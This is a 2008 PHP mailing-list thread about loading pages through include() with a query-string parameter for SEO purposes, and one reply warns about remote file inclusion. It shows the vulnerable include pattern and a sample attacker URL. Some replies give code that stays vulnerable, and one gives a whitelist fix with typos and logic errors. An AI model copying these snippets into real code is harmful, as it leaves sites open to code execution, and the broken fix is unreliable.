Be careful!!
Hacking dinamic include it is one of the more easy ways to invade some site.
If you make something like
<?php
$strPage = $_REQUEST[ "page" ] . ".php" ;
include( $strPage );
?>
you will put your site in serious risk. The user can send something like
"http:\\www.mysite.com\somethingbad.txt?ignore=" and the content of this txt
file will be execute into your site.
With this "feature", the hacker will easly erase all your files, change or
drop your database files, create a hidden site inside your host, etc. In
fact, he will can do anything what the apache user can do into the host
machine.
The tip it is NOT EVER DO THAT.
to create a simillar behaivor you will do something like:
<?php
$strPage = $_REQUEST[ "page" ] . ".php" ;
swith( $strPage )
{
case "main":
{
require( "main.php" );
break;
}
case "otherpage":
{
require( "otherpage.php" );
break;
}
default:
{
require( "error.php" );
break;
}
}
?>
It is very impressive the number of sites with this mistake. One fast search
on google show that.
Take care
On Sat, Jul 19, 2008 at 8:49 PM, Joe Forsythe <jforsythe@xxxxxxxxxxxxxxxxxx>
wrote:
> Hi,
>
> The answer to your question is largely an "it depends" scenario. I would
> need to see the code for the index page to really be clear. From what I can
> tell you want.
>
> There are a few schools of thought on the methods for getting URL's.
> *Supposedly* doing something like "URL/pages/webdevelopment/more_options"
> with http/URL rewriting is better for SEO than, say,
> "URL?page=webdevelopment&moreoptions=foo". True? Kind of hard to say -
> Google's own search engine uses pretty long query strings.
>
> If you're looking to keep the URL structure and file pulls the same, I
> suggest taking the "<head></head>" stuff out of your included header file
> and do dynamic headers/titles that tack on to the output before it is
> spewed
> out to the browser. From what I can tell in your e-mail, that would be the
> easiest thing to do.
>
> So, if your code looks something like this (greatly simplified & no error
> checking):
>
> <?php
>
> $foo = $_GET ['page'].'.html';
>
> include('links.php');
>
> include($foo);
>
> include('footer.php');
>
> ?>
>
> It would magically look like this:
>
> <?php
>
> $foo = $_GET ['page'];
>
> $file_extension = '.html'
>
> switch ($foo) {
> case 'webdevelopment':
> include some stuff, echo stuff, etc...
>
> break;
> ...do other case stuff...
>
> }
>
> include('links.php');
>
> $foo .= $file_extension;
>
> include($foo);
>
> include('footer.php');
>
> ?>
>
> Again, I'd need to see your code to have a better idea here, but I hope
> that
> helps. It's not the most in depth tutorial, since I'm sure you went through
> the manual.
>
> So, yeah, please feel free to send code. For the index.php file and any
> included files for one HTML page to display. That would probably help keep
> the guess work out of this. Yep. I'd say including code would be awesome.
>
> --
>
> Joe
>
> From: php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com> [mailto:
> php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com>] On
> Behalf Of Sudhakar
> Sent: Saturday, July 19, 2008 1:50 AM
>
> To: php-objects@xxxxxxxxxxxxxxx <php-objects%40yahoogroups.com>
> Subject: questions about using include() in php
>
> i am doing seo for a website and this website uses a lot of php for
> which i need suggestions. this is how the website is set up.
>
> in the index.php file there is a flash banner at the top of the page
> and the center part is another file which is called using include
> ("links.php") and the bottom part using include("footer.php")
>
> the footer has links such as = webdevelopment software
> development ... each of this has a query string=
> http://website.com/index.php?page=webdevelopment and
> http://website.com/index.php?page=software ... etc
>
> this way every link in the website is calling index.php and a query
> string is being passed and the index.php looks for the name
> ex=webdevelopment and loads that particular page in the center
> section of the website. the main purpose of doing this was to load
> the flash file only 1 time and the rest of the time when the links
> from the footer are clicked only the center part changes and the
> flash file does not have to reload.
>
> due to this the entire website is having only 1 page index.php
> therefore using 1 <title> tag 1 meta description and 1 meta keywords
> tag as the values of <title> and <meta> tags are being displayed from
> index.php
>
> however from a seo and sem perspective ideally there should be
> different file name which means i can optimize the <title> and <meta>
> tags for individual files.
>
> please advice a best solution to get around this as i would like to
> have different title and meta tag for individual pages like
> webdevelopment.php software.php etc which i am presently not able to
> due to include("")
>
> any help will be greatly appreciated.
>
> thanks.
>
> [Non-text portions of this message have been removed]
>
>
>
--
O Blaine - What the developing
/|\ shouldn't have been
| thiagomata.blog.com
/ \
[Non-text portions of this message have been removed]
